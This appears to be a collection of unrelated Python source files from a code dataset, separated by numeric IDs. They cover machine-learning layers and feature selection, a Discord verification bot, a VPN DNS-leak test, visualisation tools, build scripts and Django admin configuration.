Parameters
----------
X : array-like, shape (n_samples, n_features)
The training input samples.
y : array-like, shape (n_samples,)
the target values.
Returns
-------
None
"""
self.selected_features_ = generate_features(X)
while self.selected_features_.shape[0] != self.n_features:
getLogger(__name__).info(
"Current selected set: %s", self.selected_features_)
self._estimator.fit(X[:, self.selected_features_], y)
weights = self.weight_func(self._estimator)
getLogger(__name__).info(
"Weights for all selected features: %s", weights)
least_important = np.argmin(weights)
getLogger(__name__).info(
"Deleting the least important feature %d",
self.selected_features_[least_important])
self.selected_features_ = np.delete(self.selected_features_,
least_important)
self.best_score_ = cross_val_score(self._estimator,
X[:, self.selected_features_], y, cv=self.cv,
scoring=self.measure).mean()
self._estimator.fit(X[:, self.selected_features_], y)
|
470281
|
def fact(n):
if (n == 1):
return n;
else:
return n*fact(n-1);
test = int(input())
for i in range (0,test):
val = int(input())
print(fact(val))
##Example Test Case
# Sample input:
# 4
# 1
# 2
# 5
# 3
# Sample output:
#
# 1
# 2
# 120
# 6
|
470282
|
import aiohttp
import json
from random import choice, choices, randint, sample
from discord import File
from discord.ext import commands
from discord.utils import get
class Verification(commands.Cog):
# Closer the number approaches 1, the more often the word list will be refreshed. Linear
def __init__(self, bot):
self.bot = bot
self.config_full = json.loads(open('assets/config.json').read())
self.word_list_refresh_rate = 99
self.word_cache_size = 1000
@commands.command()
@commands.has_permissions(manage_guild=True)
async def verification(self, ctx, state: bool):
"""Enable or disable the verification system"""
config = self.config_full[str(ctx.message.guild.id)]
if state is True and config["verification_channel"] is None:
channel = await ctx.message.guild.create_text_channel(name="Verification")
role = await ctx.message.guild.create_role(name="Unverified")
config.update(verification_channel=channel.id, verification_role=role.id)
json.dump(self.config_full, open('config.json', 'w'), indent=2, separators=(',', ': '))
elif state is False and config["verification_channel"] is not None:
channel = get(ctx.message.guild.text_channels, id=config["verification_channel"])
role = get(ctx.message.guild.roles, id=config["verification_role"])
await channel.delete()
await role.delete()
config.update(verification_channel=None, verification_role=None)
json.dump(self.config_full, open('config.json', 'w'), indent=2, separators=(',', ': '))
@commands.command()
async def verify(self, ctx):
"""Verify yourself (the bot will DM you)"""
try:
# Increment if use count exists
self.verify.use_count += 1
except AttributeError:
# Otherwise initialize it on verify function object for persistence
self.verify.use_count = 1
if self.verify.use_count % self.word_list_refresh_rate == 1:
# Retrieve list of words from MIT page
async with aiohttp.ClientSession() as client:
async with client.get("https://www.mit.edu/~ecprice/wordlist.10000") as response:
text = await response.text()
self.verify.words = sample(text.splitlines(), self.word_cache_size)
await client.close()
challenge_selection = randint(0, 2)
challenge_wording = ['computation', 'phrase', 'single word basic color displayed on the pillow']
# Some initialization
random_phrase = '( Pillows are so comfy 😊)'
image_selection = ['', None]
answer_value = 0
# Image color challenge
if challenge_selection == 2:
image_answer_pairing = [
['blue', './assets/blue.jpg'],
['red', './assets/red.jpg'],
['white', './assets/white.jpg'],
['black', './assets/black.jpg']
]
image_selection = image_answer_pairing[randint(0, 3)]
# Math challenge
elif challenge_selection == 1:
random_phrase = f'{randint(1,9)}{choice(["+","-","*"])}{randint(1,9)}{choice(["+","-","*"])}{randint(1,9)}'
answer_value = str(eval(random_phrase))
# Phrase challenge
else:
# Pick three random words and DM them to the user
random_phrase = ' '.join(choices(self.verify.words, k=3))
insertion_point = randint(1, len(random_phrase) - 2)
random_phrase_modded = f'{random_phrase[:insertion_point+1]}' \
f'{random_phrase[insertion_point+1:]}' \
f''.replace('o', 'ο').replace('e', 'е').replace('a', 'а').replace('i', 'і')
expected_answer = [random_phrase, answer_value, image_selection[0]][challenge_selection]
await ctx.message.author.send(
f"Please reply with the following {challenge_wording[challenge_selection]}: {random_phrase_modded}",
file=File(image_selection[1]) if challenge_selection == 2 else None)
# Wait for 30 seconds for the user to send back the verification phrase
await self.bot.wait_for("message", timeout=30, check=lambda message: message.content == expected_answer)
await ctx.message.author.send("Verification complete 👍")
# If they pass, remove the unverified role
config = json.loads(open('config.json', 'r').read())
role = get(ctx.guild.roles, id=config[str(ctx.guild.id)]["verification_role"])
await ctx.message.author.remove_roles(role)
@verify.error
async def verify_error(self, ctx, error):
if isinstance(error, commands.CommandInvokeError):
await ctx.message.author.send(f"Command timeout! Please rerun the command to verify. {error}")
def setup(bot):
bot.add_cog(Verification(bot))
|
470298
|
import tensorflow as tf
import time
"""
We employ a residual connection around each of the two sub-layers, followed by layer normalization.
That is, the output of each sub-layer is LayerNorm(x+ Sublayer(x)), where Sublayer(x) is the function implemented by the sub-layer itself. """
class LayerNormResidualConnection(object):
def __init__(self,x,y,layer_index,type,residual_dropout=0.1,use_residual_conn=True):
self.x=x
self.y=y
self.layer_index=layer_index
self.type=type
self.residual_dropout=residual_dropout
self.use_residual_conn=use_residual_conn
#call residual connection and layer normalization
def layer_norm_residual_connection(self):
print("LayerNormResidualConnection.use_residual_conn:",self.use_residual_conn)
##if self.use_residual_conn:
# x_residual=self.residual_connection()
# x_layer_norm=self.layer_normalization(x_residual)
#else:
x_layer_norm = self.layer_normalization(self.x)
return x_layer_norm
def residual_connection(self):
output=self.x + tf.nn.dropout(self.y, 1.0 - self.residual_dropout)
return output
# layer normalize the tensor x, averaging over the last dimension.
def layer_normalization(self,x):
"""
x should be:[batch_size,sequence_length,d_model]
:return:
"""
filter=x.get_shape()[-1] #last dimension of x. e.g. 512
print("layer_normalization:==================>variable_scope:","layer_normalization"+str(self.layer_index)+self.type)
with tf.variable_scope("layer_normalization"+str(self.layer_index)+self.type):
# 1. normalize input by using mean and variance according to last dimension
mean=tf.reduce_mean(x,axis=-1,keep_dims=True) #[batch_size,sequence_length,1]
variance=tf.reduce_mean(tf.square(x-mean),axis=-1,keep_dims=True) #[batch_size,sequence_length,1]
norm_x=(x-mean)*tf.rsqrt(variance+1e-6) #[batch_size,sequence_length,d_model]
# 2. re-scale normalized input back
scale=tf.get_variable("layer_norm_scale",[filter],initializer=tf.ones_initializer) #[filter]
bias=tf.get_variable("layer_norm_bias",[filter],initializer=tf.ones_initializer) #[filter]
output=norm_x*scale+bias #[batch_size,sequence_length,d_model]
return output #[batch_size,sequence_length,d_model]
def test():
start = time.time()
batch_size=128
sequence_length=1000
d_model=512
x=tf.ones((batch_size,sequence_length,d_model))
y=x*3-0.5
layer_norm_residual_conn=LayerNormResidualConnection(x,y,0,'encoder')
output=layer_norm_residual_conn.layer_norm_residual_connection()
end = time.time()
print("x:",x,";y:",y,";output:",output,";time spent:",(end-start))
#test()
|
470317
|
from onnxruntime.capi import _pybind_state as C
import threading
from functools import wraps
def run_once_aten_op_executor(f):
"""
Decorator to run a function only once.
:param f: function to be run only once during execution time despite the number of calls
:return: The original function with the params passed to it if it hasn't already been run before
"""
@wraps(f)
def aten_op_executor_wrapper(*args, **kwargs):
if not aten_op_executor_wrapper.has_run:
with aten_op_executor_wrapper.lock:
if not aten_op_executor_wrapper.has_run:
aten_op_executor_wrapper.has_run = True
return f(*args, **kwargs)
aten_op_executor_wrapper.lock = threading.Lock()
aten_op_executor_wrapper.has_run = False
return aten_op_executor_wrapper
@run_once_aten_op_executor
def load_aten_op_executor_cpp_extension():
from onnxruntime.training.ortmodule.torch_cpp_extensions import aten_op_executor
C.register_aten_op_executor(str(aten_op_executor.is_tensor_argument_address()),
str(aten_op_executor.execute_aten_operator_address()))
|
470407
|
import FWCore.ParameterSet.Config as cms
from L1TriggerConfig.DTTPGConfigProducers.L1DTConfigFromDB_cfi import *
|
470425
|
from monosat import *
import functools
import math
import os
import random
import random
import sys
print("Generate random 0-1 diophantine equation")
seed = random.randint(1,100000)
random.seed(seed)
print("RandomSeed=" + str(seed))
bitwidth=8
n_equations=3
n_vars=3
max_co = 10
vars=[]
for i in range(n_vars):
vars.append(BitVector(bitwidth))
for i in range(n_equations):
coefficients=[]
for c in range(n_vars):
coefficients.append(random.randint(0,1))
val = random.randint(0,max_co*n_vars)
rhs = BitVector(bitwidth, val)
sum = BitVector(bitwidth,0)
for j in range(len(coefficients)):
if coefficients[j]>0:
sum = sum + ( vars[j])
Assert(sum==rhs)
print(str(i) + ": " + str(coefficients) + " = " + str(val) )
result =Solve()
print("Result is " + str(result))
if(result):
for i in range(len(vars)):
print(str(i) + "= " + str(vars[i].value()))
|
470430
|
import sys, os, argparse
from OpenGL.GL.SUN import vertex
from tk3dv.extern.binvox import binvox_rw
from tk3dv.common import drawing
import tk3dv.nocstools.datastructures as ds
from PyQt5.QtWidgets import QApplication
import PyQt5.QtCore as QtCore
from PyQt5.QtGui import QKeyEvent, QMouseEvent, QWheelEvent
import numpy as np
from tk3dv.pyEasel import *
from EaselModule import EaselModule
from Easel import Easel
import OpenGL.GL as gl
class VGVizModule(EaselModule):
def __init__(self):
super().__init__()
def init(self, argv=None):
self.Parser = argparse.ArgumentParser(description='This module visualizes voxel grids.', fromfile_prefix_chars='@')
ArgGroup = self.Parser.add_argument_group()
ArgGroup.add_argument('-v', '--voxel-grid', help='Specify binvox or numpy file.', required=True)
self.Args, _ = self.Parser.parse_known_args(argv)
if len(sys.argv) <= 1:
self.Parser.print_help()
exit()
_, Ext = os.path.splitext(self.Args.voxel_grid)
if 'binvox' not in Ext and 'npz' not in Ext and 'npy' not in Ext:
raise RuntimeError('Not a binvox or numpy file')
print('[ INFO ]: Opening voxel grid from file:', self.Args.voxel_grid)
if 'binvox' in Ext:
with open(self.Args.voxel_grid, 'rb') as f:
self.VG = binvox_rw.read_as_3d_array(f)
self.VGDS = ds.VoxelGrid(self.VG)
else:
VGData = np.load(self.Args.voxel_grid)
# print(VGData.files) # 'full_voxel_grid', 'surface_voxel_grid'
self.VG = VGData['surface_voxel_grid']
self.VGDS = ds.VoxelGrid(self.VG)
self.PointSize = 3
self.showObjIdx = 0 # 0, 1, 2
def step(self):
pass
def drawVG(self, Alpha=0.8, ScaleX=1, ScaleY=1, ScaleZ=1):
if self.showObjIdx == 0 or self.showObjIdx == 1:
self.VGDS.drawVG(Alpha, ScaleX, ScaleY, ScaleZ)
if self.showObjIdx == 0 or self.showObjIdx == 2:
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glPushMatrix()
gl.glScale(ScaleX, ScaleY, ScaleZ)
self.VGDS.draw(pointSize=self.PointSize)
gl.glPopMatrix()
def draw(self):
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glPushMatrix()
gl.glTranslate(-20, -20, -20)
self.drawVG(0.7, 40, 40, 40)
gl.glPopMatrix()
def keyPressEvent(self, a0: QKeyEvent):
if a0.key() == QtCore.Qt.Key_Plus: # Increase or decrease point size
if self.PointSize < 20:
self.PointSize = self.PointSize + 1
if a0.key() == QtCore.Qt.Key_Minus: # Increase or decrease point size
if self.PointSize > 1:
self.PointSize = self.PointSize - 1
if a0.key() == QtCore.Qt.Key_T: # Toggle objects
self.showObjIdx = (self.showObjIdx + 1)%(3)
if __name__ == '__main__':
app = QApplication(sys.argv)
mainWindow = Easel([VGVizModule()], sys.argv[1:])
mainWindow.show()
sys.exit(app.exec_())
|
470432
|
import random
from multiprocessing.pool import ThreadPool
from desktop_local_tests.dns_helper import DNSHelper
from desktop_local_tests.local_test_case import LocalTestCase
from xv_leak_tools.exception import XVEx
from xv_leak_tools.log import L
class TestDNSVanillaAggressive(LocalTestCase):
'''Summary:
Test whether DNS leaks during regular VPN connection.
Details:
This test will first ask the system for all known DNS servers. It will then connect to the VPN
and perform multiple DNS requests in parallel. It asserts that the server used for the DNS
lookup was not one which was known to the system before connecting to the VPN and that it was
also one of the VPN server IPs. There is redundancy in this check but no harm.
Discussion:
The test is very similar to TestDNSVanilla but just performs multiple DNS lookups. Most
providers should pass this test. The
Weaknesses:
Currently uses dig to decide if DNS leaks. This isn't reliable for some VPN providers. Some
providers intercept DNS upstream and change the destination DNS server to their own server.
However dig will still report the server which it originally sent the request to.
Scenarios:
* Run on a system with DNS servers configured to be public IP addresses, e.g. 8.8.8.8.
* Run on a system with DNS servers configured to be local IP addresses, e.g. 192.0.0.0/24. This
is a common setup with home routers where the router acts as the DNS server.
'''
# TODO: Potentially make configurable
HOSTNAMES = [
'google.com', 'twitter.com', 'facebook.com', 'stackoverflow.com', 'yahoo.com', 'amazon.com',
]
# TODO: Potentially make configurable
NUMBER_OF_DNS_REQUESTS = 50
def __init__(self, devices, parameters):
super().__init__(devices, parameters)
self.dns_servers_before_connect = []
self.vpn_dns_servers = []
self.dns_helper = DNSHelper(self.localhost['dns_tool'])
self.thread_pool = ThreadPool(processes=10)
def dns_server_known(self, hostname):
server = self.localhost['dns_tool'].lookup(hostname)[0]
self.assertIsIn(
server, self.dns_servers_before_connect,
"DNS server used was {} but that wasn't known to the system".format(server))
def dns_server_is_vpn_dns(self, hostname):
self.dns_helper.dns_server_is_vpn_server(
self.dns_servers_before_connect, self.vpn_dns_servers, hostname=hostname)
def check_multiple_asynchronously(self, func):
results = []
# TODO: Think about what else we could do here. More domains? Different methods of DNS
# lookup?
for _ in range(0, TestDNSVanillaAggressive.NUMBER_OF_DNS_REQUESTS):
# Warning: If you miss the trailing comma in the args to the func passed to apply_async
# then the string will be interpreted as an array of arguments!
results.append(self.thread_pool.apply_async(
func, (random.choice(TestDNSVanillaAggressive.HOSTNAMES),)))
# There is no result returned from check_dns, but .get() will propagate any exception
# thrown by check_dns, which is what we want.
first_exception = None
for result in results:
try:
result.get()
except XVEx as ex:
if first_exception is None:
first_exception = ex
# pylint: disable=raising-bad-type
if first_exception is not None:
raise first_exception
def test(self):
L.describe('Find all known DNS servers before connecting to VPN')
self.dns_servers_before_connect = self.localhost['dns_tool'].known_servers()
L.info("All known DNS servers are: {}".format(self.dns_servers_before_connect))
# Sanity check that the DNS servers we initially use are known. This is not strictly part
# of the test.
self.check_multiple_asynchronously(self.dns_server_known)
L.describe('Open and connect the VPN application')
self.localhost['vpn_application'].open_and_connect()
self.vpn_dns_servers = self.localhost['vpn_application'].dns_server_ips()
L.info("VPN DNS servers are: {}".format(self.vpn_dns_servers))
L.describe(
"Check DNS server used was a VPN DNS server by doing {} asynchronous DNS "
"requests".format(TestDNSVanillaAggressive.NUMBER_OF_DNS_REQUESTS))
self.check_multiple_asynchronously(self.dns_server_is_vpn_dns)
|
470442
|
from ..peer import Peer
class FormUpdate:
def __init__(self, json_object):
self.update_id = json_object.get("updateId")
self.form_id = json_object.get("formId")
self.dialog = Peer(json_object.get("dialog"))
self.sender = Peer(json_object.get("sender"))
@property
def chat(self):
return self.dialog
|
470458
|
import torch.nn as nn
import numpy as np
from unet import UNet
class XTYTUNet(nn.Module):
"""
Create a XT,YT U-Net
the network is used to process a 2D cine MR image of shape
(1,2,Nx,Ny,Nt)
the CNN first "rotates" the sample to the xt- and the yt-view,
then applies a U-Net on the spatio-temporal slices and
then re-assembles to cine MR image from the processed slices.
N.B.
i) as a default, the CNN used for the xt-view and the yt-view is the same
since radial-undersampling artefacts have a "noise-like" structure.
For different sampling patterns, one could set weight_sharing to False
ii) Note that wheter to use the residual connection or not, is decided in
the class XTYTFFTCNN
"""
def __init__(self,n_ch_in=2,n_ch_out=2, n_enc_stages=3, n_convs_per_stage=4,n_filters=64,weight_sharing=True):
super(XTYTUNet, self).__init__()
self.n_ch_in = n_ch_in
self.n_ch_out = n_ch_out
self.n_filters = n_filters
self.n_convs_per_stage = n_convs_per_stage
self.weight_sharing = weight_sharing
self.n_enc_stages=n_enc_stages
#dimensionality of the U-Net; this is alwys 2 for the XT,YT-Net
dim=2
#if weight sharing is applied for the xt- and the yt-CNN,
#might me beneficial for Cartesian sampling trajectories, for example;
if weight_sharing:
self.conv_xt_yt = UNet(dim,n_ch_in=n_ch_in,n_ch_out=n_ch_out,n_enc_stages=n_enc_stages,n_convs_per_stage=n_convs_per_stage,
n_filters=n_filters)
else:
self.conv_xt = UNet(dim,n_ch_in=n_ch_in,n_ch_out=n_ch_out,n_enc_stages=n_enc_stages,n_convs_per_stage=n_convs_per_stage,
n_filters=n_filters)
self.conv_yt = UNet(dim,n_ch_in=n_ch_in,n_ch_out=n_ch_out,n_enc_stages=n_enc_stages,n_convs_per_stage=n_convs_per_stage,
n_filters=n_filters)
self.reshape_op_xyt2xt_yt = XYT2XT_YT()
self.reshape_op_xt_yt2xyt = XT_YT2XYT()
def forward(self, x):
#get the number of sampels used; needed for re-assembling operation
# x has the shape (mb,2,nx,ny,nt)
mb = x.shape[0]
#input is 5d -> output is 4d
x_xt = self.reshape_op_xyt2xt_yt(x,'xt')
x_yt = self.reshape_op_xyt2xt_yt(x,'yt')
#input is 4d
if self.weight_sharing:
x_xt_conv = self.conv_xt_yt(x_xt)
x_yt_conv = self.conv_xt_yt(x_yt)
else:
x_xt_conv = self.conv_xt(x_xt)
x_yt_conv = self.conv_yt(x_yt)
#input is 4d -> output is 5d
x_xt_r = self.reshape_op_xt_yt2xyt(x_xt_conv,'xt',mb)
x_yt_r = self.reshape_op_xt_yt2xyt(x_yt_conv,'yt',mb)
#5d tensor
x = 0.5*(x_xt_r + x_yt_r)
return x
class XYT2XT_YT(nn.Module):
"""
Class needed for the reshaping operator:
Given x with shape (mb,2,Nx,Ny,Nt), x is reshped to have
either shape (mb*Nx,2,Ny,Nt) for the yt-domain or
the shape (mb*Ny,2,Nx,Nt) for the xt-domain
"""
def __init__(self):
super(XYT2XT_YT, self).__init__()
def forward(self, x, reshape_type):
return xyt2xt_yt(x,reshape_type)
def xyt2xt_yt(x,reshape_type):
#x has shape (mb,2,nx,ny,nt)
mb,nch,nx,ny,nt = x.shape
if reshape_type=='xt':
x = x.permute(0,2,1,3,4).view(mb*nx, nch, ny, nt)
elif reshape_type =='yt':
x = x.permute(0,3,1,2,4).view(mb*ny, nch, nx, nt)
return x
class XT_YT2XYT(nn.Module):
"""
Class needed for the reassembling the cine MR image to its original shape:
reverses the operation XYT2XT_YT,
note that the mini-batch size is needed
"""
def __init__(self):
super(XT_YT2XYT, self).__init__()
def forward(self, x, reshape_type,mb):
return xt_yt2xyt(x, reshape_type,mb)
def xt_yt2xyt(x,reshape_type,mb):
if reshape_type =='xt':
_,nch,ny,nt=x.shape
nx = np.int(x.shape[0]/mb)
x = x.view(mb,nx,nch,ny,nt).permute(0,2,1,3,4)
elif reshape_type=='yt':
_,nch,nx,nt=x.shape
ny = np.int(x.shape[0]/mb)
x = x.view(mb,ny,nch,nx,nt).permute(0,2,3,1,4)
return x
|
470463
|
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="audax",
version="0.0.4",
author='<NAME>',
description="audio ML for Jax",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/SarthakYadav/audio_data_utils",
# package_dir={"": ""},
packages=[
"audax",
"audax.commons",
"audax.core",
"audax.frontends",
"audax.models",
"audax.models.layers",
"audax.transforms",
"audax.training_utils",
"audax.training_utils.data_v2",
],
python_requires=">=3.7"
)
|
470507
|
import renderdoc as rd
import rdtest
class D3D12_Render_Pass(rdtest.TestCase):
demos_test_name = 'D3D12_Render_Pass'
def check_capture(self):
rp1 = self.find_action("RP 1")
rp2 = self.find_action("RP 2")
action = next(d for d in rp1.children if d.flags & rd.ActionFlags.Drawcall)
self.controller.SetFrameEvent(action.eventId, False)
self.check_triangle(back=[0.0, 0.0, 1.0, 1.0])
action = next(d for d in rp2.children if d.flags & rd.ActionFlags.Drawcall)
self.controller.SetFrameEvent(action.eventId, False)
self.check_triangle(back=[1.0, 0.0, 1.0, 1.0])
action = self.get_last_action()
self.controller.SetFrameEvent(action.eventId, False)
self.check_pixel_value(action.copyDestination, 0.45, 0.45, [0.0, 0.0, 1.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.55, 0.55, [1.0, 0.0, 1.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.25, 0.25, [0.0, 1.0, 0.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.75, 0.75, [0.0, 1.0, 0.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.75, 0.25, [0.0, 0.0, 0.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.25, 0.75, [0.0, 0.0, 0.0, 1.0])
|
470521
|
from django.contrib import admin
from councilmatic.subscriptions import models
#class KeywordInline(admin.StackedInline):
# model = KeywordSubscription
# extra = 3
#class CouncilmemberInline(admin.StackedInline):
# model = CouncilMemberSubscription
# extra = 3
#class SubscriptionAdmin(admin.ModelAdmin):
# inlines = [KeywordInline, CouncilmemberInline]
#class LegActionInline(admin.StackedInline):
# model = LegAction
# extra = 1
class ContentFeedParameterInline(admin.StackedInline):
model = models.ContentFeedParameter
extra = 0
class ContentFeedRecordAdmin(admin.ModelAdmin):
inlines = [ContentFeedParameterInline]
def queryset(self, request):
return models.ContentFeedRecord.objects.prefetch_related('feed_params')
class SubscriptionDispatchRecordInline(admin.TabularInline):
model = models.SubscriptionDispatchRecord
extra = 0
class SubscriptionAdmin(admin.ModelAdmin):
list_display = ['__unicode__', 'last_sent']
inlines = [SubscriptionDispatchRecordInline]
def queryset(self, request):
return models.Subscription.objects.select_related('feed_record').prefetch_related('feed_record__feed_params')
class SubscriberAdmin(admin.ModelAdmin):
list_display = ['username', 'date_joined', 'last_login']
admin.site.register(models.Subscription, SubscriptionAdmin)
admin.site.register(models.Subscriber, SubscriberAdmin)
admin.site.register(models.ContentFeedRecord, ContentFeedRecordAdmin)
#admin.site.register(models.SearchSubscription)
#admin.site.register(models.EmailChannel)
#admin.site.register(models.RssChannel)
#admin.site.register(models.SmsChannel)
|
470531
|
from collections import OrderedDict
import numpy as np
import plaidml
import plaidml.tile as tile
import plaidml.keras
plaidml.keras.install_backend()
import keras.backend as K
class SandboxOp(tile.Operation):
def __init__(self, code, a, b, output_shape):
super(SandboxOp, self).__init__(code, [('A', a), ('B', b)], [('O', output_shape)])
def main(code, tensor_A, tensor_B, output_shape):
print(K.backend())
op = SandboxOp(code, tensor_A, tensor_B, tile.Shape(plaidml.DType.FLOAT32, output_shape))
print(op.sole_output().shape)
print(op.sole_output().eval())
if __name__ == '__main__':
plaidml._internal_set_vlog(1)
A = K.variable(np.arange(12).reshape(4, 3))
B = K.variable(np.arange(3).reshape(3))
code = """function (A[N, M], B[M]) -> (O) {
O[i, j: N, M] = =(A[i, j] + B[j]), i/2 + j/2 + 1/2 < 2;
}"""
out_shape = (2, 3)
main(code, A, B, out_shape)
|
470562
|
import math
import pyqtgraph
from pyqtgraph.Qt import QtCore, QtGui
class StdHitOffsets():
def run(self, replay=None):
replay_idx = 0 if replay==None else replay
self.__init_gui_elements(replay_idx)
self.__construct_gui()
self.__set_data(replay_idx)
self.win.show()
return self.win
def __init_gui_elements(self, replay_idx):
self.win = QtGui.QMainWindow() #pyqtgraph.GraphicsWindow(title=)
self.area = pyqtgraph.dockarea.DockArea()
self.dock_scatter = pyqtgraph.dockarea.Dock('Scatterplot', size=(500,400))
self.dock_offset_freq_distr = pyqtgraph.dockarea.Dock('Hit offset freq', size=(500,200))
self.dock_offset_dist_distr = pyqtgraph.dockarea.Dock('Hit offset vs distance freq', size=(500,200))
self.hit_offset_scatter_plot = pyqtgraph.PlotWidget(title='Hits scatterplot')
self.hit_offset_distr_plot = pyqtgraph.PlotWidget(title='Hits distribution')
self.scatter_data_plot = self.hit_offset_scatter_plot.plot()
self.distr_data_plot = self.hit_offset_distr_plot.plot()
self.model_data_plot = self.hit_offset_distr_plot.plot()
def __construct_gui(self):
self.dock_offset_freq_distr.addWidget(self.hit_offset_scatter_plot)
self.dock_offset_dist_distr.addWidget(self.hit_offset_distr_plot)
self.area.addDock(self.dock_offset_freq_distr, 'top')
self.area.addDock(self.dock_offset_dist_distr, 'bottom')
self.win.setCentralWidget(self.area)
def __set_data(self, replay_idx):
self.win.setWindowTitle(get_beatmap().metadata.name + ' ' + get_replays()[replay_idx].get_name())
# Data extraction
map_data = StdMapData.get_map_data(get_beatmap().hitobjects)
replay_data = get_replay_data()[replay_idx]
score_data = StdScoreData.get_score_data(replay_data, map_data)
timing_data = score_data['replay_t']
hitoffset_data = score_data['replay_t'] - score_data['map_t']
self.hit_offset_scatter_plot.addLine(x=None, y=0, pen=pyqtgraph.mkPen('r', width=1))
self.hit_offset_scatter_plot.setLabel('left', 'Hit offset', units='ms', unitPrefix='')
self.hit_offset_scatter_plot.setLabel('bottom', 'Time since start', units='ms', unitPrefix='')
self.scatter_data_plot.setData(timing_data, hitoffset_data, pen=None, symbol='o', symbolPen=None, symbolSize=2, symbolBrush=(100, 100, 255, 200))
# Plotting distribution of hits
vec_normal_distr = np.vectorize(self.__normal_distr)
avg = np.mean(hitoffset_data)
std = np.std(hitoffset_data)
freqs = pyqtgraph.pseudoScatter(np.hstack(hitoffset_data), spacing=1)
self.distr_data_plot.setData(hitoffset_data, freqs, pen=None, symbol='o', symbolSize=5, symbolPen=(255,255,255,150), symbolBrush=(0,0,255,150))
hits = np.arange(-200, 200)
pdf = vec_normal_distr(hits, avg, std)
self.hit_offset_distr_plot.setLabel('left', '# of hits', units='', unitPrefix='')
self.hit_offset_distr_plot.setLabel('bottom', 'Hit offset', units='ms', unitPrefix='')
self.model_data_plot.setData(hits, pdf*len(hitoffset_data), pen='y')
def __normal_distr(self, x, avg, std):
return 1/(std*((2*math.pi)**0.5))*math.exp(-0.5*((x - avg)/std)**2)
|
470585
|
import numpy as np
from rpn.utils.torch_utils import to_tensor, to_numpy
import torch
try:
from torch_geometric.data import Data, batch
except ImportError as e:
print('Warning: cannot import torch_geometric. This does not affect the core functionality of this repo.')
def add_supernodes(node_index, edge_index, supernode_clique):
"""
Add supernodes to an existing graph defined by node_index and edge_index.
Supernodes are defined by supernode_clique, which is a list of cliques (set of nodes)
:param node_index: [N]
:param edge_index: [E, 2]
:param supernode_clique: [SN, C]
:return: new_node_index: [N + SN], new_edge_index: [E + SN * (SN - 1) + C * 2 * SN]
"""
num_sn = len(supernode_clique)
sn_start_idx = node_index.max() + 1
sn_node_index = np.arange(num_sn) + sn_start_idx
sn_edge_index = [edge_index]
# add bi-directional edge to the supernode from each node in the clique
for sni, snc in zip(sn_node_index, supernode_clique):
clique_edge = np.zeros((len(snc) * 2, 2), dtype=np.int64)
clique_edge[:len(snc), 0] = snc
clique_edge[len(snc):, 0] = sni
clique_edge[:len(snc), 1] = sni
clique_edge[len(snc):, 1] = snc
sn_edge_index.append(clique_edge)
# add connections among the supernodes
sn_edge_index.append(fully_connected_edges(sn_node_index))
return np.concatenate([node_index, sn_node_index]), np.concatenate(sn_edge_index)
def fully_connected_edges(node_index, self_connection=False):
"""
Return fully connected edges (no self-connection)
:param node_index: node indices
:param self_connection:
:return: [N * (N - 1), 2]
"""
n = len(node_index)
if not self_connection:
edges = np.zeros([n * (n - 1), 2], dtype=np.int64)
else:
edges = np.zeros([n ** 2, 2], dtype=np.int64)
count = 0
for r in range(n):
for c in range(n):
if r != c or self_connection:
edges[count, :] = [r, c]
count += 1
return edges
def split_graph_feature(node_feat, edge_feat, node_index_list, edge_index_list):
"""
Split batched node and edge features (graph features) to individual lists
:param node_feat: torch.Tensor of shape [N1 + N2 + ..., D1]
:param edge_feat: torch.Tensor of shape [E1 + E2 + ..., D2]
:param node_index_list: a list of node indices, in the form of numpy array
:param edge_index_list: a list of edge indices, in the form of numpy array
:return: node_feat_least: [[N1, D1], [N2, D1], ...], edge_feat_list: [[E1, D2], [E2, D2], ...]
"""
node_feat_list = split_clique_feature(node_feat, node_index_list)
edge_feat_list = split_clique_feature(edge_feat, edge_index_list)
return node_feat_list, edge_feat_list
def split_clique_feature(clique_feat, clique_index_list):
assert(isinstance(clique_index_list, (tuple, list)))
num_element = [e.shape[0] for e in clique_index_list]
assert(clique_feat.size(0) == np.sum(num_element))
clique_feat_list = clique_feat.split(num_element, dim=0)
return clique_feat_list
def collate_torch_graphs(node_feat, edge_feat, node_index_list, edge_index_list):
"""
Collate a list of graphs and their features.
:param node_feat: torch.Tensor of shape [N1 + N2 + ..., D1]
:param edge_feat: torch.Tensor of shape [E1 + E2 + ..., D2]
:param node_index_list: a list of node indices, in the form of numpy array
:param edge_index_list: a list of edge indices, in the form of numpy array
:return: a collated graph of type torch.geometric.data.Data
"""
node_feat_list, edge_feat_list = split_graph_feature(node_feat, edge_feat, node_index_list, edge_index_list)
graphs = []
# TODO: vectorize this
for nf, ef, n_idx, e_idx in zip(node_feat_list, edge_feat_list, node_index_list, edge_index_list):
# add supernode to the graph
supernode_clique = np.tile(n_idx[None, ...], (len(e_idx), 1))
sn_n_idx, sn_e_idx = add_supernodes(n_idx, e_idx, supernode_clique)
sn_feat = torch.cat([nf, ef], dim=0)
torch_e_idx = to_tensor(sn_e_idx).long().t().contiguous().to(node_feat.device)
graphs.append(Data(x=sn_feat, edge_index=torch_e_idx))
batched_graphs = batch.Batch.from_data_list(graphs)
num_node = [n.shape[0] for n in node_index_list]
num_edge = [e.shape[0] for e in edge_index_list]
assert(batched_graphs.x.shape[0] == (np.sum(num_node) + np.sum(num_edge)))
return batched_graphs
def separate_graph_collated_features(collated_feat, node_index_list, edge_index_list):
"""
Separate a collated feature by a list of graphs
:param collated_feat: feature of shape [N + E, D]
:param node_index_list: a list of node index
:param edge_index_list: a list of edge index
:return: separated node and edge features of shape [N, D] and [E, D], respectively
"""
num_node = [n.shape[0] for n in node_index_list]
num_edge = [e.shape[0] for e in edge_index_list]
num_feat = np.sum(num_node) + np.sum(num_edge)
assert(collated_feat.size(0) == num_feat)
num_feat_list = [None] * (len(num_node) + len(num_edge))
num_feat_list[::2] = num_node
num_feat_list[1::2] = num_edge
feat_list = collated_feat.split(num_feat_list, dim=0)
node_feat = torch.cat(feat_list[::2], dim=0)
edge_feat = torch.cat(feat_list[1::2], dim=0)
assert(node_feat.shape[0] == np.sum(num_node))
assert(edge_feat.shape[0] == np.sum(num_edge))
return node_feat, edge_feat
def test_graph_collation():
